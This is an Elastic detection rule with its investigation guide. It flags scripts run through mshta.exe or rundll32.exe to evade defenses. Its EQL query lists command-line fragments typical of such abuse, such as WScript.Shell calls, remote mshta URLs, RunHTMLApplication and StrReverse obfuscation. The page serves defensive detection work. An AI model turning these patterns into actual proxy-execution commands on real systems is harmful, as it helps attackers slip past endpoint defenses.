Script Execution via Microsoft HTML Application
Identifies the execution of scripts via HTML applications using Windows utilities rundll32.exe or mshta.exe. Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries.
Elastic rule (View on GitHub)
1[metadata]
2creation_date = "2020/09/09"
3integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender"]
4maturity = "production"
5min_stack_comments = "Breaking change at 8.14.0 for the Windows Integration."
6min_stack_version = "8.14.0"
7updated_date = "2025/01/15"
8
9[rule]
10author = ["Elastic"]
11description = """
12Identifies the execution of scripts via HTML applications using Windows utilities rundll32.exe or mshta.exe.
13Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed
14binaries.
15"""
16from = "now-9m"
17index = [
18 "winlogbeat-*",
19 "logs-windows.*",
20 "logs-system.security*",
21 "logs-windows.sysmon_operational-*",
22 "logs-sentinel_one_cloud_funnel.*",
23 "logs-m365_defender.event-*"
24]
25language = "eql"
26license = "Elastic License v2"
27name = "Script Execution via Microsoft HTML Application"
28risk_score = 73
29rule_id = "181f6b23-3799-445e-9589-0018328a9e46"
30severity = "high"
31tags = [
32 "Domain: Endpoint",
33 "OS: Windows",
34 "Use Case: Threat Detection",
35 "Tactic: Defense Evasion",
36 "Data Source: System",
37 "Data Source: Sysmon",
38 "Data Source: SentinelOne",
39 "Data Source: Microsoft Defender for Endpoint",
40 "Resources: Investigation Guide"
41]
42timestamp_override = "event.ingested"
43type = "eql"
44
45query = '''
46process where host.os.type == "windows" and event.type == "start" and
47 process.name : ("rundll32.exe", "mshta.exe") and
48 (
49 (process.command_line :
50 (
51 "*script*eval(*",
52 "*script*GetObject*",
53 "*.regread(*",
54 "*WScript.Shell*",
55 "*.run(*",
56 "*).Exec()*",
57 "*mshta*http*",
58 "*mshtml*RunHTMLApplication*",
59 "*mshtml*,#135*",
60 "*StrReverse*",
61 "*.RegWrite*",
62 /* Issue #379 */
63 "*window.close(*",
64 "* Chr(*"
65 )
66 and not process.parent.executable :
67 ("?:\\Program Files (x86)\\Citrix\\System32\\wfshell.exe",
68 "?:\\Program Files (x86)\\Microsoft Office\\Office*\\MSACCESS.EXE",
69 "?:\\Program Files\\Quokka.Works GTInstaller\\GTInstaller.exe")
70 ) or
71
72 (process.name : "mshta.exe" and
73 not process.command_line : ("*.hta*", "*.htm*", "-Embedding") and process.args_count >=2) or
74
75 /* Execution of HTA file downloaded from the internet */
76 (process.name : "mshta.exe" and process.command_line : "*\\Users\\*\\Downloads\\*.hta*") or
77
78 /* Execution of HTA file from archive */
79 (process.name : "mshta.exe" and
80 process.args : ("?:\\Users\\*\\Temp\\7z*", "?:\\Users\\*\\Temp\\Rar$*", "?:\\Users\\*\\Temp\\Temp?_*", "?:\\Users\\*\\Temp\\BNZ.*"))
81 )
82'''
83note = """## Triage and analysis
84
85> **Disclaimer**:
86> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
87
88### Investigating Script Execution via Microsoft HTML Application
89
90Microsoft HTML Applications (HTA) allow scripts to run in a trusted environment, often using utilities like `rundll32.exe` or `mshta.exe`. Adversaries exploit this by executing malicious scripts under the guise of legitimate processes, bypassing defenses. The detection rule identifies suspicious script execution patterns, such as unusual command lines or execution from common download locations, to flag potential abuse.
91
92### Possible investigation steps
93
94- Review the process command line details to identify any suspicious patterns or indicators of malicious activity, such as the presence of script execution commands like "eval", "GetObject", or "WScript.Shell".
95- Check the parent process executable path to determine if the process was spawned by a known legitimate application or if it deviates from expected behavior, especially if it is not from the specified exceptions like Citrix, Microsoft Office, or Quokka.Works GTInstaller.
96- Investigate the origin of the HTA file, particularly if it was executed from common download locations like the Downloads folder or temporary archive extraction paths, to assess if it was downloaded from the internet or extracted from an archive.
97- Analyze the process arguments and count to identify any unusual or unexpected parameters that could indicate malicious intent, especially if the process name is "mshta.exe" and the command line does not include typical HTA or HTM file references.
98- Correlate the event with other security logs and alerts from data sources like Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and determine if this activity is part of a broader attack pattern.
99
100### False positive analysis
101
102- Execution of legitimate scripts by enterprise applications like Citrix, Microsoft Office, or Quokka.Works GTInstaller can trigger false positives. Users can mitigate this by adding these applications to the exclusion list in the detection rule.
103- Scripts executed by mshta.exe that do not involve malicious intent, such as internal web applications or administrative scripts, may be flagged. Users should review these scripts and, if deemed safe, exclude them based on specific command line patterns or parent processes.
104- HTA files downloaded from trusted internal sources or vendors might be mistakenly identified as threats. Users can create exceptions for these sources by specifying trusted download paths or file hashes.
105- Temporary files created by legitimate software installations or updates in user temp directories can be misinterpreted as malicious. Users should monitor these activities and exclude known safe processes or directories from the detection rule.
106
107### Response and remediation
108
109- Immediately isolate the affected system from the network to prevent further spread of the malicious script or unauthorized access.
110- Terminate any suspicious processes identified by the detection rule, specifically those involving `rundll32.exe` or `mshta.exe` with unusual command lines.
111- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious files or scripts.
112- Review and analyze the command lines and scripts executed to understand the scope and intent of the attack, and identify any additional compromised systems.
113- Restore the affected system from a known good backup if malicious activity is confirmed and cannot be fully remediated.
114- Implement network segmentation to limit the ability of similar threats to propagate across the network in the future.
115- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or data have been compromised."""
116
117
118[[rule.threat]]
119framework = "MITRE ATT&CK"
120[[rule.threat.technique]]
121id = "T1218"
122name = "System Binary Proxy Execution"
123reference = "https://attack.mitre.org/techniques/T1218/"
124
125[[rule.threat.technique.subtechnique]]
126id = "T1218.005"
127name = "Mshta"
128reference = "https://attack.mitre.org/techniques/T1218/005/"
129[[rule.threat.technique.subtechnique]]
130id = "T1218.011"
131name = "Rundll32"
132reference = "https://attack.mitre.org/techniques/T1218/011/"
133
134
135
136[rule.threat.tactic]
137id = "TA0005"
138name = "Defense Evasion"
139reference = "https://attack.mitre.org/tactics/TA0005/"
Triage and analysis
Disclaimer: This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
Investigating Script Execution via Microsoft HTML Application
Microsoft HTML Applications (HTA) allow scripts to run in a trusted environment, often using utilities like rundll32.exe
or mshta.exe
. Adversaries exploit this by executing malicious scripts under the guise of legitimate processes, bypassing defenses. The detection rule identifies suspicious script execution patterns, such as unusual command lines or execution from common download locations, to flag potential abuse.
Possible investigation steps
- Review the process command line details to identify any suspicious patterns or indicators of malicious activity, such as the presence of script execution commands like "eval", "GetObject", or "WScript.Shell".
- Check the parent process executable path to determine if the process was spawned by a known legitimate application or if it deviates from expected behavior, especially if it is not from the specified exceptions like Citrix, Microsoft Office, or Quokka.Works GTInstaller.
- Investigate the origin of the HTA file, particularly if it was executed from common download locations like the Downloads folder or temporary archive extraction paths, to assess if it was downloaded from the internet or extracted from an archive.
- Analyze the process arguments and count to identify any unusual or unexpected parameters that could indicate malicious intent, especially if the process name is "mshta.exe" and the command line does not include typical HTA or HTM file references.
- Correlate the event with other security logs and alerts from data sources like Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and determine if this activity is part of a broader attack pattern.
False positive analysis
- Execution of legitimate scripts by enterprise applications like Citrix, Microsoft Office, or Quokka.Works GTInstaller can trigger false positives. Users can mitigate this by adding these applications to the exclusion list in the detection rule.
- Scripts executed by mshta.exe that do not involve malicious intent, such as internal web applications or administrative scripts, may be flagged. Users should review these scripts and, if deemed safe, exclude them based on specific command line patterns or parent processes.
- HTA files downloaded from trusted internal sources or vendors might be mistakenly identified as threats. Users can create exceptions for these sources by specifying trusted download paths or file hashes.
- Temporary files created by legitimate software installations or updates in user temp directories can be misinterpreted as malicious. Users should monitor these activities and exclude known safe processes or directories from the detection rule.
Response and remediation
- Immediately isolate the affected system from the network to prevent further spread of the malicious script or unauthorized access.
- Terminate any suspicious processes identified by the detection rule, specifically those involving
rundll32.exe
ormshta.exe
with unusual command lines. - Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious files or scripts.
- Review and analyze the command lines and scripts executed to understand the scope and intent of the attack, and identify any additional compromised systems.
- Restore the affected system from a known good backup if malicious activity is confirmed and cannot be fully remediated.
- Implement network segmentation to limit the ability of similar threats to propagate across the network in the future.
- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or data have been compromised.
Related rules
- Attempt to Install Kali Linux via WSL
- Control Panel Process with Unusual Arguments
- ImageLoad via Windows Update Auto Update Client
- Microsoft Build Engine Started by a System Process
- Potential File Transfer via Certreq